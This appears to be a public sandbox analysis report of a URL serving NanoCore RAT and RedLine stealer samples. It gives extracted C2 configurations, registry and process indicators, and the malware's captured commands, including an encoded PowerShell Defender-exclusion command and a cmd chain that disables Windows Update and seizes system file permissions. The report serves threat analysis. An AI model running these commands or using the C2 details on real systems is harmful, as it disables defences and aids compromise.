nanocore | hxxp://81[.]161[.]229[.]110/htdocs/

Resubmissions

02-09-2022 20:06

220902-yvgf4abefr 10

02-09-2022 20:04

02-09-2022 20:03

02-09-2022 19:55

02-09-2022 19:49

02-09-2022 18:42

Analysis

max time kernel
600s
max time network
605s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
02-09-2022 18:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://81.161.229.110/htdocs/

Score

10^/10

nanocore redline steelodo discovery evasion exploit infostealer keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

STEELODO

45.147.199.166:14009

Attributes

auth_value
27f5101c1e1e25824ce750d8513603af

Extracted

Family

nanocore

Version

1.2.2.0

katiebrady616.ddns.net:705

Mutex

6614a0d3-74cf-4cba-9b22-46de5dee170d

Attributes

activate_away_mode
true
backup_connection_host
katiebrady616.ddns.net
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2022-06-10T20:30:36.872525236Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
705
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
6614a0d3-74cf-4cba-9b22-46de5dee170d
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
katiebrady616.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

redline

78.24.216.5:42717

Attributes

auth_value
6687e352a0604d495c3851d248ebf06f

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe.w936zuz.partial	family_redline
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe	family_redline
behavioral2/memory/4520-198-0x0000000000BD0000-0x0000000000BF0000-memory.dmp	family_redline

Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

EdEYMrpFBNbTRHo.exeMyMXEmYnFoPFBPt.exeYjXWQorEXSCmNzB.exeqRAPNmLiGFHwToK.exe

pid process

4308 EdEYMrpFBNbTRHo.exe
4384 MyMXEmYnFoPFBPt.exe
1788 YjXWQorEXSCmNzB.exe
4520 qRAPNmLiGFHwToK.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3984 takeown.exe
1504 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4308	EdEYMrpFBNbTRHo.exe
4384	MyMXEmYnFoPFBPt.exe
1788	YjXWQorEXSCmNzB.exe
4520	qRAPNmLiGFHwToK.exe

pid	process
3984	takeown.exe
1504	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EdEYMrpFBNbTRHo.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	EdEYMrpFBNbTRHo.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3984 takeown.exe
1504 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3984	takeown.exe
1504	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

YjXWQorEXSCmNzB.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DDP Host = "C:\\Program Files (x86)\\DDP Host\\ddphost.exe"	YjXWQorEXSCmNzB.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

YjXWQorEXSCmNzB.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YjXWQorEXSCmNzB.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

97 ip-api.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	YjXWQorEXSCmNzB.exe

flow	ioc
97	ip-api.com

Drops file in Program Files directory 2 IoCs

Processes:

YjXWQorEXSCmNzB.exe

description	ioc	process
File created	C:\Program Files (x86)\DDP Host\ddphost.exe	YjXWQorEXSCmNzB.exe
File opened for modification	C:\Program Files (x86)\DDP Host\ddphost.exe	YjXWQorEXSCmNzB.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4988 sc.exe
8 sc.exe
1156 sc.exe
3512 sc.exe
2668 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4988	sc.exe
8	sc.exe
1156	sc.exe
3512	sc.exe
2668	sc.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 39384a26b9aed801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a10000000000200000000001066000000010000200000009de0d3cfd82d337a407cb9c1e5e118675cb272be23fc568f16672813e70f9135000000000e8000000002000020000000e1caaddd2954b02fb7702049292c9cf58a5b1dbf352654bc1b7a28216a9d3e6720000000538107e8348f49f20652257d910bc91b97a0e595145ed7fda8fdfab3d3656ad9400000004f689393828ed5c93b7beb9541d617e596197c995e28382994bac816d878774caef86d6a8a27ccc9a863d2c103accec124f4f456cf2488a8d32a3283364c5ee3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "368916352"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{CDC9179C-2AFF-11ED-89AC-EE6CABA3804C} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a1000000000020000000000106600000001000020000000298d37d79ffb0cfbd36affb7bce39f35a9e8e2350c92f4bdaee8408c50d12059000000000e8000000002000020000000a26664b15431de6e5432004832255d7fa501941782ec1fedb07eed999f93b94f200000005f738b3e584412f7920b4c8b554fd9bfe0f090f29b87e914ac18fa7517e1291e40000000be56696bbb30307ea770c97d0d7a66249f64dbedd38d9c31e2f42f8712053c62dd470811d6f1f7230f0a06816d8835bac0086dd66266cd84c1db26df89711888	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0ed1fa70cbfd801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2803890054"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0186da60cbfd801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2803890054"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30981900"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30981900"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{0BF07277-F544-462D-89B7-0A70DEA6590D}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

4732 reg.exe
4872 reg.exe
964 reg.exe
948 reg.exe
60 reg.exe
3816 reg.exe
2076 reg.exe
5104 reg.exe
1528 reg.exe

pid	process
4732	reg.exe
4872	reg.exe
964	reg.exe
948	reg.exe
60	reg.exe
3816	reg.exe
2076	reg.exe
5104	reg.exe
1528	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeMyMXEmYnFoPFBPt.exeYjXWQorEXSCmNzB.exeqRAPNmLiGFHwToK.exe

pid	process
4636	powershell.exe
4636	powershell.exe
4384	MyMXEmYnFoPFBPt.exe
4384	MyMXEmYnFoPFBPt.exe
1788	YjXWQorEXSCmNzB.exe
1788	YjXWQorEXSCmNzB.exe
1788	YjXWQorEXSCmNzB.exe
4520	qRAPNmLiGFHwToK.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

YjXWQorEXSCmNzB.exe

pid process

1788 YjXWQorEXSCmNzB.exe

pid	process
1788	YjXWQorEXSCmNzB.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exeEdEYMrpFBNbTRHo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeMyMXEmYnFoPFBPt.exeYjXWQorEXSCmNzB.exeqRAPNmLiGFHwToK.exe

description	pid	process
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	4308	EdEYMrpFBNbTRHo.exe
Token: SeShutdownPrivilege	4104	powercfg.exe
Token: SeCreatePagefilePrivilege	4104	powercfg.exe
Token: SeShutdownPrivilege	4868	powercfg.exe
Token: SeCreatePagefilePrivilege	4868	powercfg.exe
Token: SeShutdownPrivilege	2300	powercfg.exe
Token: SeCreatePagefilePrivilege	2300	powercfg.exe
Token: SeShutdownPrivilege	4108	powercfg.exe
Token: SeCreatePagefilePrivilege	4108	powercfg.exe
Token: SeTakeOwnershipPrivilege	3984	takeown.exe
Token: SeDebugPrivilege	4384	MyMXEmYnFoPFBPt.exe
Token: SeDebugPrivilege	1788	YjXWQorEXSCmNzB.exe
Token: SeDebugPrivilege	4520	qRAPNmLiGFHwToK.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

iexplore.exe

pid process

5052 iexplore.exe
5052 iexplore.exe
5052 iexplore.exe
5052 iexplore.exe
5052 iexplore.exe
5052 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

5052 iexplore.exe
5052 iexplore.exe
1808 IEXPLORE.EXE
1808 IEXPLORE.EXE
1808 IEXPLORE.EXE
1808 IEXPLORE.EXE

pid	process
5052	iexplore.exe
5052	iexplore.exe
5052	iexplore.exe
5052	iexplore.exe
5052	iexplore.exe
5052	iexplore.exe

pid	process
5052	iexplore.exe
5052	iexplore.exe
1808	IEXPLORE.EXE
1808	IEXPLORE.EXE
1808	IEXPLORE.EXE
1808	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exeEdEYMrpFBNbTRHo.execmd.execmd.exe

description	pid	process	target process
PID 5052 wrote to memory of 1808	5052	iexplore.exe	IEXPLORE.EXE
PID 5052 wrote to memory of 1808	5052	iexplore.exe	IEXPLORE.EXE
PID 5052 wrote to memory of 1808	5052	iexplore.exe	IEXPLORE.EXE
PID 5052 wrote to memory of 4308	5052	iexplore.exe	EdEYMrpFBNbTRHo.exe
PID 5052 wrote to memory of 4308	5052	iexplore.exe	EdEYMrpFBNbTRHo.exe
PID 5052 wrote to memory of 4384	5052	iexplore.exe	MyMXEmYnFoPFBPt.exe
PID 5052 wrote to memory of 4384	5052	iexplore.exe	MyMXEmYnFoPFBPt.exe
PID 5052 wrote to memory of 4384	5052	iexplore.exe	MyMXEmYnFoPFBPt.exe
PID 4308 wrote to memory of 4636	4308	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 4308 wrote to memory of 4636	4308	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 4308 wrote to memory of 4028	4308	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 4308 wrote to memory of 4028	4308	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 4308 wrote to memory of 1756	4308	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 4308 wrote to memory of 1756	4308	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 4028 wrote to memory of 1156	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 1156	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 3512	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 3512	4028	cmd.exe	sc.exe
PID 1756 wrote to memory of 4104	1756	cmd.exe	powercfg.exe
PID 1756 wrote to memory of 4104	1756	cmd.exe	powercfg.exe
PID 4028 wrote to memory of 2668	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 2668	4028	cmd.exe	sc.exe
PID 1756 wrote to memory of 4868	1756	cmd.exe	powercfg.exe
PID 1756 wrote to memory of 4868	1756	cmd.exe	powercfg.exe
PID 4028 wrote to memory of 4988	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 4988	4028	cmd.exe	sc.exe
PID 1756 wrote to memory of 2300	1756	cmd.exe	powercfg.exe
PID 1756 wrote to memory of 2300	1756	cmd.exe	powercfg.exe
PID 1756 wrote to memory of 4108	1756	cmd.exe	powercfg.exe
PID 1756 wrote to memory of 4108	1756	cmd.exe	powercfg.exe
PID 4028 wrote to memory of 8	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 8	4028	cmd.exe	sc.exe
PID 4028 wrote to memory of 4732	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 4732	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 3816	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 3816	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 2076	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 2076	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 4872	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 4872	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 964	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 964	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 3984	4028	cmd.exe	takeown.exe
PID 4028 wrote to memory of 3984	4028	cmd.exe	takeown.exe
PID 4028 wrote to memory of 1504	4028	cmd.exe	icacls.exe
PID 4028 wrote to memory of 1504	4028	cmd.exe	icacls.exe
PID 4028 wrote to memory of 5104	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 5104	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 948	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 948	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 60	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 60	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 1528	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 1528	4028	cmd.exe	reg.exe
PID 4028 wrote to memory of 3552	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 3552	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 4808	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 4808	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 3512	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 3512	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 3212	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 3212	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 4348	4028	cmd.exe	schtasks.exe
PID 4028 wrote to memory of 4348	4028	cmd.exe	schtasks.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://81.161.229.110/htdocs/
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5052

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5052 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1808

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\EdEYMrpFBNbTRHo.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\EdEYMrpFBNbTRHo.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1156

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3512

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:2668

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:4988

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:8

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:3816

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:2076

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:4872

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:964

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1504

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5104

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:948

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:60

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
